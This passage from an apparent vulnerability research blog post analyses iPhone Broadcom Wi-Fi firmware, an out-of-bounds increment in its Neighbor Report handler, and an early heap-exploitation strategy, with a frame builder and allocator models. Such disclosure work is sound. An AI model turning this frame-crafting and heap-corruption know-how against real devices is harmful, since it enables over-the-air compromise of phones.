Curiously, the stack is no longer located after the heap, but rather precedes it. This modification has the advantage of preventing potential collisions between the stack and the heap (which were possible in previous firmware versions).

To further our understanding of the firmware, let’s attempt to identify the set of supported high-level features. While ROM images typically contain a wealth of features, not all OEMs choose to utilise every single feature. Instead, the supported features are governed by the RAM’s contents, which selectively adds support for the capabilities chosen by the OEM.

In the context of Android-resident firmware images, identifying the supported features was made easier due to the inclusion of “feature tags” within the version string embedded in the firmware’s RAM image. Each tag indicated support for a corresponding feature within the firmware image. Unfortunately, the iPhone’s Wi-Fi firmware images did away with the detailed version strings, and instead opted for a generic string containing the build type and the chip’s revision:

Nevertheless, we can still gain some insight into the firmware’s feature set, by reverse-engineering the firmware itself. Let’s take a look inside and see what we can find!
It’s Bigger On The Inside

Although most symbols have been stripped from the firmware’s ROM image, whatever symbols remain hint at the features supported by the image. Indeed, going over the strings in the combined image (mostly the ROM, the RAM is nearly devoid of strings), we come across many of the features we’ve identified in the past. Surprisingly, however, we also find a great deal of new features.

While adding features can (sometimes) result in better user experience, it’s important to remember that the Wi-Fi chip is a highly privileged component.

First, as a network interface, the chip has access to all of the host’s Wi-Fi traffic (both inbound and outbound). Therefore, attackers controlling the Wi-Fi firmware can leverage this vantage point to inject or manipulate data viewed by the host. One avenue of attack would therefore be to manipulate the host’s unencrypted web traffic and insert a browser exploit, allowing attackers to gain control over the corresponding process on the host. Other applications on the host which rely on unencrypted communications may be similarly attacked.

In addition to the aforementioned attack surface, the Wi-Fi firmware itself can carry out attacks against the host. As we’ve seen in previous blog posts, the chip communicates with the host using a variety of control messages and through a privileged physical interface (e.g., PCIe); if we were to find errors in the host’s processing of any of those, we might be able to take over the host itself (indeed, we’ll carry out such attacks in the next blog post!).

Due to the above risks, it’s important that the TCB constituted by the Wi-Fi chip remain relatively small. Any components added to the Wi-Fi firmware carry the risk of vulnerabilities being introduced into the firmware which would subsequently allow attackers to assume control over the chip (and perhaps even the entire system).

This risk is compounded by the fact that the firmware employs far fewer defence mechanisms than modern operating systems. Most notably, it does not employ ASLR, does not have stack cookies and fails to implement safe heap unlinking. Therefore, even relatively weak primitives may be exploitable within the Wi-Fi firmware (in fact, we’ll see just such an example later on!).

With that in mind, let’s take a look at the features present in the Wi-Fi firmware. It’s important to note that the mere presence of these code paths in the firmware does not imply that they are enabled by default. Rather, in most cases the host chooses whether to enable specific features, depending on user or network related configurations.
Apple-Specific Features

After some preliminary exploration, we come across a group of unfamiliar strings referencing a feature called “AWDL”. This acronym refers to “Apple Wireless Direct Link”; an Apple-specific protocol designed to provide peer-to-peer connectivity, notably used by AirDrop and AirPlay. The presence of Apple-specific functionality within the ROM affirms the suspicion that these Wi-Fi chips are used exclusively by Apple devices.

From a security perspective, it appears that the attack surface exposed by this functionality within the Wi-Fi firmware is rather limited. The firmware contains mechanisms for the configuration of AWDL-related features, but such operations are driven primarily by host-side logic (via AppleBCMWLANCore and IO80211Family).

Moving right along, we come across another group of unexpected strings:

This code originates from mDNSResponder, Apple’s open-source implementation of Multicast DNS (a standardised zero-configuration service commonly used within the Apple ecosystem).

Reverse-engineering the above fragments, we come to the realisation that it is a stripped-down version of mDNSResponder, mostly responsible for performing wake on demand via mDNS (for networks that include a Bonjour Sleep Proxy). Consequently, it does not offer all the functionality provided by a fully-fledged mDNS client. Nonetheless, embedding code from complex libraries such as mDNSResponder could carry undesired side effects.

For starters, mDNSResponder itself has been affected by several security issues in the past. More subtly, non-security bugs in libraries can become security-relevant when migrating between systems whose characteristics differ so widely from one another. Concretely, on the Wi-Fi chip address zero points to the firmware’s interrupt vectors -- a mapped, writable address. Being able to modify this address would allow attackers to gain code-execution on the chip, thereby converting a class of “benign” bugs, such as a null-pointer accesses, to RCEs.

Offloading Mechanisms

Since the Wi-Fi SoC’s ARM core is less power-hungry than the application processor, it stands to reason that some network related functionality be relegated to the firmware, when possible. This concept is neither new, nor is it unique to the mobile setting; offloading to the NIC occurs in desktop environments as well, primarily in the form of TCP offloading (via a TCP Offload Engine, or TOE).

Regardless, while the advantages of offloading are clear, it’s important to be aware of the potential downsides as well. For starters, as we’ve mentioned before, the more features are added into the Wi-Fi firmware, the less auditable it becomes. Additionally, offloading features often require parsing of high-level protocols. Since the Wi-Fi firmware does not contain its own TCP/IP stack, it must resort to parsing all layers in the stack manually, up to the layer at which the offloading occurs.

Inspecting the firmware reveals at least two features which allow offloading of high-level protocols to the Wi-Fi firmware: ICMPv6 offloading and TCP KeepAlive offloading. Apple’s host-side drivers contain controls for enabling and disabling these offloading features (see AppleBCMWLANCore), subsequently handing over control over these packets to the Wi-Fi firmware rather than the host.

While beyond the scope of this blog post, auditing both of the aforementioned offloading features revealed two security bugs allowing attackers to either leak constrained data from the firmware or to crash the firmware running on the Wi-Fi SoC (for more information see the bug tracker entries linked above).
Generic Attack Surfaces

While the aforementioned attack surfaces may be interesting from an exploratory point of view, each of the outlined features was rather constrained in scope. Perhaps, we could find a more fruitful attack surface within the Wi-Fi firmware?

...This is where some familiarity with the Wi-Fi standards comes in handy!

Wi-Fi frames can be split into three distinct categories. Each frame is assigned a category by inspecting the “type” and “subtype” fields in its MAC header:

The categories are as follows:

Data Frames - Carry data (and QoS data) over the Wi-Fi network.
Control Frames - Body-less frames assisting with the delivery of other frames (using ACKs, RTS/CTS, Block ACKs and more).
Management Frames - Perform complex operations, including connecting to a network, modifying the state of individual stations (STAs), authenticating and more.
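This category split is encoded directly in the Frame Control field at the start of the MAC header. A minimal decoder, per the standard's frame format (bits 0-1 of the first byte carry the protocol version, bits 2-3 the type, bits 4-7 the subtype), might look as follows:

```python
FRAME_TYPES = {0: "Management", 1: "Control", 2: "Data"}

def frame_category(fc_first_byte):
    """Decode a frame's category and subtype from the first Frame Control byte."""
    ftype = (fc_first_byte >> 2) & 0b11      # bits 2-3: type
    subtype = (fc_first_byte >> 4) & 0b1111  # bits 4-7: subtype
    return FRAME_TYPES.get(ftype, "Reserved"), subtype

# Action frames are management frames (type 0) with subtype 13
assert frame_category(0xD0) == ("Management", 13)
# RTS is a control frame (type 1) with subtype 11
assert frame_category(0xB4) == ("Control", 11)
```

The 0xD0 case is the one we care about here: every action frame a station receives starts with that byte.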

Let’s take a second to consider the categories above from a security PoV.

While data frames contain interesting attack surfaces (such as frame aggregation via A-MSDU/A-MPDU), they hide little complexity otherwise. That said, features present directly on the RX-path, such as the aforementioned offloading mechanisms, are generally also accessible through data frames, thereby increasing the exposed attack surface. Control frames, on the other hand, offer limited complexity and therefore do not significantly contribute to the attack surface.

Unlike the first two categories, management frames are where the majority of the firmware’s complexity lies. Many of the mechanisms encapsulated by management frames make for interesting targets in their own right; including authentication and association. However, we’ll choose to focus on one subtype offering the largest attack surface of all -- Action Frames.

Most of the logic behind “advanced” Wi-Fi features (such as roaming, radio measurements, etc.) is implemented by means of Action Frames. As their name implies, these frames trigger “actions” in stations within the network, potentially modifying their state.

Curiously, unlike data frames, management frames (and therefore action frames as well) are normally unencrypted, even if networks employ security protocols such as WPA/WPA2. Instead, certain management frames can be encrypted by enabling 802.11w Protected Management Frames. When enabled, 802.11w allows for confidentiality of those frames’ contents, as well as a form of replay protection.

Summing up, action frames constitute a large portion of the attack surface -- they are mostly unprotected frames, using which state-altering functionality is carried out. To discover the exact extent of their exposed attack surface, let’s explore those frames in more depth.
Action Frames

Consulting IEEE 802.11-2016 (Table 9-47), the full list of action frame categories is quite formidable:

To illustrate the amount of complexity encapsulated by action frames, let’s return to the iPhone’s Wi-Fi firmware. Tracing our way through the RX-path, we quickly reach the function at which action frames are handled within the firmware (referred to as “wlc_recv_mgmtact” in the ROM):


wlc_recv_mgmtact - 0x1A79F4

As we can see, the function performs some preliminary operations, before handing off processing to one of the numerous handlers within the firmware. Each action frame category is delegated to a single handler. Counting the action frame handlers and corresponding frame types supported by the iPhone’s firmware, we find 13 different supported categories, resulting in 34 different supported frame types. This is a substantial attack surface to explore!

To assess the handlers’ security, we’ll reverse-engineer each of the above functions. While this is a slow and rather tedious process, recall that each vulnerability found in the above handlers implies a triggerable over-the-air vulnerability in the Wi-Fi chip.

Before attempting a manual audit, we also “fuzzed” the action frame handlers. To do so, we developed an on-chip Wi-Fi fuzzer, allowing injection of frames directly into the aforementioned handler functions (without transmitting the frames over-the-air). While the fuzzer allowed for high-speed injection of frames (namely, thousands of frames per second), running it using a small corpus of action frames and inducing bit-flips in them was unfruitful... One possible explanation for this approach’s failure is the strict structure mandated by many action frames. Perhaps these results could be improved by fuzzing based on a grammar derived from the Wi-Fi standard, or by enforcing structural constraints on the fuzzed content.

Regardless, we can employ some tricks to speed up our manual exploration. Recall that Wi-Fi primarily relies on Information Elements (IEs), tagged bundles of data, to convey information. The same principle applies to action frames -- their payloads typically consist of multiple IEs, each encapsulating different pieces of information relating to the handled frame. As the IE tags are (mostly) unique within the Wi-Fi standard, we can simply lookup the tag value corresponding to each processed IE, allowing us to quickly familiarise ourselves with the surrounding code.
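Since IEs follow a simple tag/length/value layout, a generic walker is a one-screen affair. The sketch below (names are ours, and real firmware parsers differ in their error handling) shows the iteration pattern such handlers implement:

```python
def parse_ies(body):
    """Walk a buffer of 802.11 Information Elements (1-byte tag, 1-byte length, value)."""
    ies, off = [], 0
    while off + 2 <= len(body):
        tag, length = body[off], body[off + 1]
        if off + 2 + length > len(body):
            break  # truncated IE: stop rather than read out of bounds
        ies.append((tag, body[off + 2 : off + 2 + length]))
        off += 2 + length
    return ies

# e.g. an SSID IE (tag 0) followed by a vendor-specific IE (tag 221)
body = bytes([0, 4]) + b"home" + bytes([221, 3]) + b"\x00\x11\x22"
assert parse_ies(body) == [(0, b"home"), (221, b"\x00\x11\x22")]
```

The tag values are what make the reverse-engineering shortcut work: spotting a comparison against a known tag constant immediately identifies which IE a code path consumes.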

After going through the handlers outlined above, we identified a number of vulnerabilities.

First, we discovered a vulnerability in 802.11v Wireless Network Managements (WNM). WNM is a set of standards allowing clients to configure themselves within a wireless network and to exchange information about the network’s topology. Within the WNM category, the “WNM Sleep Mode Response” frame serves to update the Group Temporal Key (GTK) when the set of peers in the network changes. As it happens, reverse-engineering the WNM handler revealed that the corresponding function failed to verify the length of the encapsulated GTK, thereby triggering a controlled heap overflow (see the bug tracker for more information).

By cross-referencing the GTK handling method, we were able to identify a similar vulnerability in 802.11r Fast BSS Transition (FBT). Once again, the firmware failed to verify the GTK’s length, resulting in a heap overflow.

While both of the above vulnerabilities are interesting in their own right, we will not discuss them any further in this blog post. Instead, we’ll focus on a different vulnerability altogether; one with a weaker primitive. By demonstrating how even relatively “weak” primitives can be exploited on the Wi-Fi firmware, we’ll showcase the need for stronger exploit mitigations.

To make matters more interesting, we’ll construct our entire exploit using nothing but action frames. These frames are so feature-rich, that by leveraging them we will be able to perform heap shaping, create allocation primitives, and of course, trigger the vulnerability itself.
802.11k Radio Resource Management

802.11k is an amendment to the Wi-Fi standard aiming to bring Radio Resource Management (RRM) capabilities to Wi-Fi networks. RRM-capable stations in the network are able to perform radio measurements (and receive them), allowing access points to reduce the congestion and improve traffic utilisation in the network. The concept itself is not new in the mobile sphere; in fact, it’s been around in cellular networks for over two decades.

Within the Wi-Fi ecosystem, RRM is commonly utilised in tandem with 802.11r FBT (or the proprietary CCKM) to enable seamless access point assisted roaming. As stations decide to “handover” to different access points (based on their radio measurements), they can consult the access points within the network in order to obtain a list of potential neighbours with which they may reassociate.

To implement all of the above, a set of action frames (and a new action category) have been added to the Wi-Fi standard. Consequently, clients can perform radio and link measurement requests, receive the corresponding reports, and even process reports containing their neighbouring access points (should they decide to roam).

All of the above functionality is also present in the Wi-Fi firmware on the iPhone:

Auditing the handlers above, we come across one function of particular note; the handler for Neighbor Report Response frames.
The Vulnerability

Neighbor Report Response (NRREP) frames are reports delivered from the access point to stations in the network, informing stations of neighbouring access points in their vicinity. Upon roaming, the stations may use these parameters to reassociate with the aforementioned neighbours. Providing this information spares the stations the need to perform extensive scans on their own -- a rather time consuming operation. Instead, they may simply rely on the report, which informs them of the specific channels and operating classes inhabited by each neighbour.

Like many action frames, NRREPs also contain a “dialog token” (9.6.7.7). This 1-byte field is used to correlate between requests issued by a client, and their corresponding responses. As their name implies, Neighbour Report Responses are typically transmitted in response to a corresponding request made by the client earlier on (commonly as a result of a radio measurement indicating that a roam may be imminent). As we’d expect, upon sending a Neighbor Report Request, the client generates and embeds a dialog token, which is later verified when processing the corresponding NRREP returned by the access point.

However, reading more carefully through the specification reveals another interesting scenario! It appears that NRREPs may also be entirely unsolicited. In such a case, the dialog token is simply set to zero, indicating that no matching request exists.


IEEE 802.11-2016, 9.6.7.7

Consequently, NRREPs may be transmitted over the network to any client at any time, so long as it supports 802.11k RRM. Upon reception of such a report (with a zeroed dialog token), the client will simply parse the request and handle the data therein.

Continuing to read through the standard, we can piece together the frame’s overall structure; starting from the action frame header, all the way down to the encapsulated IEs:

As we can see above, the bulk of the data in the NRREP frame is conveyed through the “Neighbour Report” IE. NRREPs may contain one or more such IEs, each indicating the presence of a single neighbour.
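Putting the pieces together, the body of an unsolicited NRREP can be sketched as follows. This is an illustrative encoder (not firmware code): the category and action values are 5 and 5 per the standard's Radio Measurement category, the dialog token is zeroed for the unsolicited case, and the Neighbor Report IE (tag 52) carries the BSSID, BSSID Information, Operating Class, Channel Number and PHY Type fields:

```python
def build_nrrep_body(neighbors, dialog_token=0):
    """Build the action-frame body of a Neighbor Report Response:
    category (5 = Radio Measurement), action (5 = Neighbor Report Response),
    dialog token (0 = unsolicited), then one Neighbor Report IE per neighbor."""
    body = bytes([5, 5, dialog_token])
    for bssid, op_class, channel in neighbors:
        # IE value: BSSID (6) + BSSID Info (4) + Operating Class (1)
        #           + Channel Number (1) + PHY Type (1)
        value = bssid + b"\x00" * 4 + bytes([op_class, channel, 0])
        body += bytes([52, len(value)]) + value
    return body

body = build_nrrep_body([(b"\xaa\xbb\xcc\xdd\xee\xff", 81, 11)])
# the handler below reads the tag at body+3, the operating class at
# report_ie[12] and the channel number at report_ie[13]
assert body[3] == 52 and body[15] == 81 and body[16] == 11
```

Note that the 13-byte IE value also satisfies the handler's length check (report_ie[1] > 0xC), so a single minimal neighbour entry is enough to reach the parsing code.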

Now that we have a firm understanding of the frame’s structure, let’s take a look at the firmware’s implementation of the functionality described above. Following along from the initial NRREP handler, we quickly come to a ROM function responsible for handling the reports. Reverse-engineering the function, we arrive at the following high-level logic:

1. int wlc_rrm_recv_nrrep(void* ctx, ..., uint8_t* body, uint32_t bodylen) {
2.
3. //Ensuring the request is valid
4. if (bodylen <= 2 || !g_rrm_enabled || body[2] != stored_dialog_token)
5. ... //Handle error
6.
7. //Freeing all the previously stored reports
8. free_previous_nrreps(ctx, ...);
9.
10. //Stripping the action header
11. uint8_t* report_ie = body + 3;
12. bodylen -= 3;
13.
14. //Searching for the report IE
15. do {
16. ... //Verify the IE is valid
17. if (report_ie[0] == 52 && report_ie[1] > 0xC) //Tag, Length
18. break; //Found a matching IE!
19. } while (report_ie = bcm_next_tlv(report_ie, &bodylen));
20. if (!report_ie)
21. ... //Handle error
22.
23. //Handle the report
24. uint8_t* nrrep_data = malloc(28);
25. if (!nrrep_data)
26. ... //Handle error
27.
28. memcpy(nrrep_data + 6, report_ie + 2, 6); //Copying the BSSID
29. ... //Copying other elements...
30. nrrep_data[16] = report_ie[12]; //Operational Class
31. nrrep_data[17] = report_ie[13]; //Channel Number
32.
33. //Processing the report
34. void* elem = wlc_rrm_regclass_neighbor_count(ctx, nrrep_data, ...);
35. ...
36. }

As we can see above, the function begins by performing some cursory validation of the received request. Namely, it ensures that RRM is enabled within the network, that the report is sufficiently long, and that the received dialog token matches the stored one (if a solicited request was initiated by the client, otherwise the stored token is set to zero).

After performing the necessary validations and locating the report IE, the function proceeds to extract the encoded report information and store it within a structure of its own. Finally, the newly created structure is passed on for processing within wlc_rrm_regclass_neighbor_count. Let’s take a closer look:

1. void* wlc_rrm_regclass_neighbor_count(void* ctx, uint8_t* nrrep_data, ...) {
2.
3. //Searching for previous stored elements with the same Operational
4. //Class and Channel Number
5. if (find_nrrep_buffer_and_inc_channel_idx(ctx, nrrep_data, ...))
6. return NULL;
7.
8. //Creating a new element to hold the NRREP data
9. uint8_t* elem = zalloc(456);
10. if (!elem)
11. ... //Handle error
12. elem[4] = nrrep_data[16]; //Operational Class
13. ((uint16_t*)(elem + 6))[nrrep_data[17]]++; //Channel Number
14.
15. //Adding the element to the linked list of stored NRREPs
16. *((uint8_t**)elem) = ctx->previous_elem;
17. ctx->previous_elem = elem;
18. return elem;
19. }

As shown in the snippet above, the firmware keeps a linked list of buffers, one per “Operational Class”. Each buffer is 456 bytes long, and contains the operational class, an array holding the number of neighbours per channel, and a pointer to the next buffer in the list.

While not shown above, find_nrrep_buffer_and_inc_channel_idx performs a similar task - it goes over each element in the list, looking for an entry matching the current operational class. Upon finding a matching element, it increments the neighbour count at the index corresponding to the given channel number, and returns 1, indicating success.

So why are these handlers interesting? Consider that valid 802.11 channel numbers range from 1 to 14 in the 2.4GHz spectrum, all the way up to 196 in the 5GHz spectrum. Since each neighbour count field in the array above is 16 bits wide, we can deduce that the neighbour count array can reference channel numbers of up to 224 ((456 - 6)/sizeof(uint16_t) == 225 entries, covering indices 0 through 224).

However, looking a little closer, it appears that the functions above make no attempt to validate the Channel Number field! Therefore, malicious attackers can encode whatever value they desire in that field (up to 255). Encoding a value larger than 224 will trigger a 16-bit increment out-of-bounds (see line 13), thereby corrupting memory past the NRREP buffer!
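To make the bounds concrete, here is a small model of the write offset implied by a given Channel Number value (the offsets are taken from the snippets above; the helper names are ours):

```c
#include <assert.h>
#include <stdint.h>
#include <stddef.h>

/* Bounds involved in the NRREP neighbour-count increment. The per-channel
 * uint16_t array starts at offset 6 of the 456-byte element (see snippet). */
#define NRREP_ELEM_SIZE   456u
#define COUNT_ARRAY_OFF   6u

/* Byte offset (from the element base) written for a given channel number. */
static inline uint32_t count_write_offset(uint8_t channel) {
    return COUNT_ARRAY_OFF + (uint32_t)channel * (uint32_t)sizeof(uint16_t);
}

/* Does the 16-bit increment stay inside the element's 456 bytes? */
static inline int increment_in_bounds(uint8_t channel) {
    return count_write_offset(channel) + sizeof(uint16_t) <= NRREP_ELEM_SIZE;
}
```

Channel 224 is the last in-bounds index; a channel number of 255 lands the increment 60 bytes past the end of the buffer, matching the reach of the primitive discussed below.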
Understanding The Primitive

Before we move on, let’s take a second to understand the exploit primitive -- as mentioned above, we are able to perform 16-bit increments (which are also 16-bit aligned), spanning up to 60 bytes beyond our allocated buffer.

Oddly, while the standards specify that each NRREP may contain several encoded reports (each of which should be handled by the receiving station), it appears that the handler functions above only process a single IE at a time. Therefore, each NRREP we send will be able to trigger a single OOB increment.

IEEE 802.11-2016, 9.6.7.7

This last fact ties in rather annoyingly with another quirk in the firmware’s code -- namely, upon reception of each NRREP, the list of stored NRREP elements is freed before proceeding to process the current element (see line 7, where free_previous_nrreps is invoked). It remains unclear whether this is intended behaviour or a bug, but the immediate consequence of this oddity is that following each OOB increment, the buffers are subsequently freed, allowing other objects to take their place.

Lastly, the reception of each NRREP triggers two allocations of distinct sizes; one for the linked list element (456 bytes), and another to store the report’s data (28 bytes). As a result, any heap shaping or grooming we’ll perform will have to take both allocations into consideration.
Triggering The Vulnerability
Configuring The Network

To begin developing our exploit, we’ll use the same test network environment we described in the previous blog post, using the following topology:

As we’re going to leverage NRREPs, it’s important to set up our test network to support neighbour reports. Like many auxiliary Wi-Fi features, support for NRREPs is indicated by setting the corresponding bit in the capability IEs broadcast in the network’s beacon. RRM-related functionality is encoded using the “RM Enabled Capabilities” information element.

Since we’re using hostapd to broadcast our network, we’ll enable the rrm_neighbor_report setting in our network’s configuration. Enabling this feature should set the corresponding field in the “RM Enabled Capabilities” IE to indicate support for neighbour reports. Let’s inspect a beacon frame to make sure:

Alright, seems like our network configuration is valid! Next, we’ll want to construct an interface allowing us to send arbitrary neighbour reports to peers in the network.

To do so, we’ll extend hostapd by adding new commands to its control interface. Each new command will correspond to a single frame type we’d like to inject. After adding our code to hostapd, we can simply connect to the control interface and issue the corresponding commands, thereby triggering the transmission of the requested frames from the access point to the selected peer. You can find our patches to hostapd in the exploit bundle on the bug tracker.

It should be noted that this approach is not infallible. Since we’re utilising a SoftMAC dongle to transmit our internal network, the SoftMAC layer of the Linux Kernel is responsible for some of the MLME processing done on the host. Therefore, it’s possible that processing done by this layer will interfere with the frames we wish to send (or receive) during the exploit’s flow. To get around this limitation, we’ve taken care to construct the frames in a manner that does not clash with Linux’s SoftMAC stack.
Sending NRREPs

After configuring and broadcasting our network, we can finally attempt to trigger the vulnerability itself. This brings us to a rather important question; how will we know whether the vulnerability was triggered successfully or not? After all, a single 16-bit increment may be insufficient to cause significant corruption of the firmware’s memory. Therefore it’s entirely possible that while the OOB access will occur, the firmware will happily chug along without crashing, leaving no observable effects indicating the vulnerability was triggered.

Remembering our Wi-Fi debugger from the previous blog post, one course of action immediately springs to mind -- why not simply hook the NRREP processing function with our own handler, and see whether our handler is invoked upon transmitting a malicious NRREP? This is easier said than done; it turns out most of the NRREP handling functionality (especially the actual vulnerability trigger, which we’re interested in) is located within the ROM, preventing us from inserting a hook.

As luck would have it, a new feature developed by Broadcom can be leveraged to solve this issue. To allow tracing different parts of the firmware’s logic, including the ROM, Broadcom have introduced a set of logging functions embedded throughout the firmware. Curiously, this mechanism was not present in the Android-resident firmwares we had analysed in the past.

Reverse-engineering this mechanism, it appears to operate in the following manner: each trace is assigned an identifier, ranging from 0x0 to 0x50. When a trace is requested, the firmware inspects an internal array of the same size stored in the firmware’s RAM, to gauge whether the trace with the given identifier has been enabled or not. Each identifier has a corresponding 8-bit mask representing the types of traces enabled for it. As we are able to access the firmware’s RAM, we can simply enable any trace we like by setting the corresponding bits in the trace array. Subsequently, traces with the same ID will be outputted to the firmware’s console, allowing us to handily dump them using our Wi-Fi firmware debugger.
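Conceptually, the gating logic amounts to something like the following (the names and exact mask semantics are our reconstruction, not Broadcom's code):

```c
#include <assert.h>
#include <stdint.h>

/* One 8-bit mask per trace identifier (0x00..0x50), living in firmware RAM. */
#define MAX_TRACE_ID 0x50

static uint8_t trace_masks[MAX_TRACE_ID + 1];

/* Enable the given trace types for one identifier (e.g. via a RAM write). */
static int trace_enable(uint8_t id, uint8_t type_bits) {
    if (id > MAX_TRACE_ID)
        return 0;
    trace_masks[id] |= type_bits;
    return 1;
}

/* The check a logging stub would perform before emitting a trace. */
static int trace_is_enabled(uint8_t id, uint8_t type_bits) {
    return id <= MAX_TRACE_ID && (trace_masks[id] & type_bits) != 0;
}
```

Setting the mask byte for identifier 0x16, as done later in this section, is then a single write into this array.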

This functionality has also been incorporated into our Wi-Fi debugger, which exposes functions to read and modify the log status array, as well as an API to read out the firmware’s console.

Using the above API, we can now enable the traces referenced in the NRREP’s ROM handlers. Taking a closer look at the NRREP handling function in the firmware, we come across the following traces:

Alright, so we’ll need to enable log identifier 0x16 to observe these traces. After enabling the trace, sending an NRREP and reading out the firmware’s console, we are greeted with the following result:

Great! Our traces are being hit, indicating that the NRREP is successfully received by the station. With that, let’s move on to the next step - devising an exploit strategy.
An Exploit Strategy
Understanding The Heap

Since the vulnerability in question is a heap memory corruption, it’s important that we take a second to familiarise ourselves with the allocator’s implementation. In short, it is a “best-fit” allocator, which performs forward and backward coalescing, and keeps a singly linked list of free chunks. When chunks are allocated, they are carved from the end (highest address) of the best-fitting free chunk (smallest chunk that is large enough).

Free chunks consist of a 32-bit size field and a 32-bit “next” pointer, followed by the chunk’s contents. In-use chunks contain a single 32-bit size field, of which the top 30 bits denote the chunk’s size, and the bottom 2 bits indicate status bits. Putting it together, we arrive at the following layout:
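In C terms, the two header layouts described above can be sketched as follows (the field names are ours):

```c
#include <assert.h>
#include <stdint.h>

/* A free chunk: 32-bit size, then a 32-bit "next" pointer (singly linked
 * freelist), followed by the chunk's contents. */
typedef struct free_chunk {
    uint32_t size;
    struct free_chunk *next;
    /* contents follow */
} free_chunk_t;

/* An in-use chunk: a single 32-bit word whose top 30 bits hold the size
 * and whose bottom 2 bits hold status flags. */
typedef struct {
    uint32_t size_and_status;
    /* contents follow */
} inuse_chunk_t;

static inline uint32_t inuse_size(const inuse_chunk_t *c) {
    return c->size_and_status & ~3u;   /* i.e. size & 0xFFFFFFFC */
}
static inline uint32_t inuse_status(const inuse_chunk_t *c) {
    return c->size_and_status & 3u;
}
```

The `& 0xFFFFFFFC` masking also appears verbatim in the mitigation code examined later, which is what makes the integer-overflow behaviour there interesting.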

Sketching An Exploit Strategy

Before we rush ahead, let’s begin by devising a strategy. We already know that our exploit primitive allows us to perform 16-bit increments, spanning up to 60 bytes beyond our allocated buffer.

It’s important to note that the heap’s state, perhaps surprisingly, is incredibly stable -- little to no allocation activity occurs. What few allocations are made are freed immediately thereafter. As for frames carrying traffic (received or transmitted), they are not carved from the heap, but rather drawn from a special “pool”. As such, the presence of traffic should not affect the heap’s state.

The heap’s stability is a double-edged sword; on the one hand, we are guaranteed relative convenience when shaping and modifying the heap’s state, as no allocations other than our own will interfere with the heap’s structure. On the other hand, the set of allocations that can be made (and subsequently, targeted by us using the vulnerability primitive) is limited.

Indeed, going over the action frame handlers and searching for objects which may serve as viable targets for modification, we come up empty handed. The only data types that may be allocated either store their “interesting” data farther than 56 bytes away from their origin (accounting for the in-use chunk’s header), or simply do not contain “interesting” data for modification.

Perhaps, instead, we could leverage the heap itself to hijack the control flow? If we were able to hijack the “next” pointer of a free chunk and subsequently point it at a location of our choosing, we could overwrite the target address with a subsequent allocation’s contents. This prospect sounds rather alluring, so let’s try and pursue this route.
Writing An Exploit
Hijacking A Free Chunk

To hijack a free chunk, we’ll need to commandeer a chunk’s “next” pointer. Recall that our exploit primitive allows us some degree of control over neighbouring data structures. As such, let’s consider the following placement in which a free chunk is within range of the NRREP buffer:

Leveraging our OOB increment, we can directly modify the chunk’s “next” pointer by sending an NRREP request with the corresponding channel number. Naively, this would allow us to gain control over a free chunk in the heap, by simply directing the “next” at a location of our choosing.

However, this approach turns out to be infeasible.

In order to direct the “next” pointer at a meaningful address, we’d have to either know its value in advance (in order to calculate the number of increments required to convert the pointer from its current value to the target value), or we’d have to know the relative offset between its current value and the desired target.

As we do not know the exact addresses of heap chunks (nor would we want to resort to guessing them), the former option is ruled out. What about the latter approach? Recall that our primitive allows for 16-bit increments. Therefore, we can either increase the pointer’s value by 1 (by incrementing the bottom half-word), or by 65536 (by incrementing the top half-word).
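Concretely, a single aligned 16-bit increment affects a stored 32-bit little-endian pointer as follows (a host-side model of the effect; it assumes a little-endian host, matching the firmware's ARM core):

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Apply one 16-bit increment to either the bottom (top_half == 0) or top
 * (top_half == 1) half-word of a 32-bit little-endian value. */
static uint32_t inc_halfword(uint32_t ptr, int top_half) {
    uint8_t bytes[4];
    memcpy(bytes, &ptr, 4);                       /* little-endian host */
    uint16_t half;
    memcpy(&half, bytes + (top_half ? 2 : 0), 2);
    half++;                                       /* no carry across halves */
    memcpy(bytes + (top_half ? 2 : 0), &half, 2);
    uint32_t out;
    memcpy(&out, bytes, 4);
    return out;
}
```

Note that the increment never carries between half-words, which is why the only reachable deltas are exactly +1 and +65536.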

Incrementing the pointer by 1 will result in an unaligned chunk address in the freelist. Recall, however, that our vulnerability primitive triggers deallocations on every invocation. As it happens, the allocator’s “free” function validates that each chunk in the freelist is aligned. When an unaligned block is encountered, it generates a fault and halts the firmware. Thus, an increment of the bottom half-word will result in the firmware crashing.

Incrementing the top half-word similarly fails; since all the heap’s chunks are less than 65536 away from the RAM’s end address, incrementing the top half-word will result in the “free” function attempting to access memory beyond the RAM, triggering an access violation and halting the firmware.

So how can we commandeer a free chunk nevertheless?

To do so we’ll need to use a more subtle approach - instead of modifying the free chunk’s contents directly, we’ll aim to achieve a layout in which two free chunks overlap one another, thereby causing allocations carved from one chunk to overwrite the metadata of the other (leading to control over the latter’s “next” pointer).

Heap Shaping

Achieving a predictable heap layout is key to a reliable exploit. As our current goal is to create a specific layout (namely, two overlapping heap chunks), we need to set up the heap in a manner that allows us to reach such a layout.

Classically, heap shaping is performed by leveraging primitives allowing for control either over an allocation’s lifetime, or optionally over the allocation’s size. Triggering allocations within the heap without immediately freeing them, allows us to fill “holes” in the heap, leading to a more predictable layout.

The allocator used in the firmware is a “best-fit” allocator which allocates from high addresses to lower ones. Consequently, if all “holes” in the heap of a certain size are filled, subsequent allocations of the same size (or larger) would be carved from the best-fitting chunk, proceeding from top to bottom, thus creating a linear allocation pattern.
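The resulting allocation pattern can be demonstrated with a toy model of such an allocator (illustrative only; this is our own sketch, not Broadcom's implementation):

```c
#include <assert.h>
#include <stdint.h>

/* Minimal model of "best-fit, carve from the end": allocations come from
 * the tail (highest address) of the smallest free extent that fits. */
typedef struct { uint32_t base, size; } extent_t;

#define MAX_EXTENTS 8
static extent_t freelist[MAX_EXTENTS];
static int n_extents;

static void heap_reset(void) { n_extents = 0; }
static void heap_add_extent(uint32_t base, uint32_t size) {
    freelist[n_extents++] = (extent_t){ base, size };
}

/* Returns the address of the carved allocation, or 0 on failure. */
static uint32_t heap_alloc(uint32_t size) {
    int best = -1;
    for (int i = 0; i < n_extents; i++)
        if (freelist[i].size >= size &&
            (best < 0 || freelist[i].size < freelist[best].size))
            best = i;
    if (best < 0)
        return 0;
    freelist[best].size -= size;              /* carve from the end */
    return freelist[best].base + freelist[best].size;
}

/* Demo: once the small hole is exhausted, same-size allocations proceed
 * linearly downwards through the large chunk. */
static int heap_demo(void) {
    heap_reset();
    heap_add_extent(0x1000, 0x100);     /* small hole      */
    heap_add_extent(0x10000, 0x4000);   /* main heap chunk */
    if (heap_alloc(0xA4) != 0x105C)     /* hole is best fit */
        return 0;
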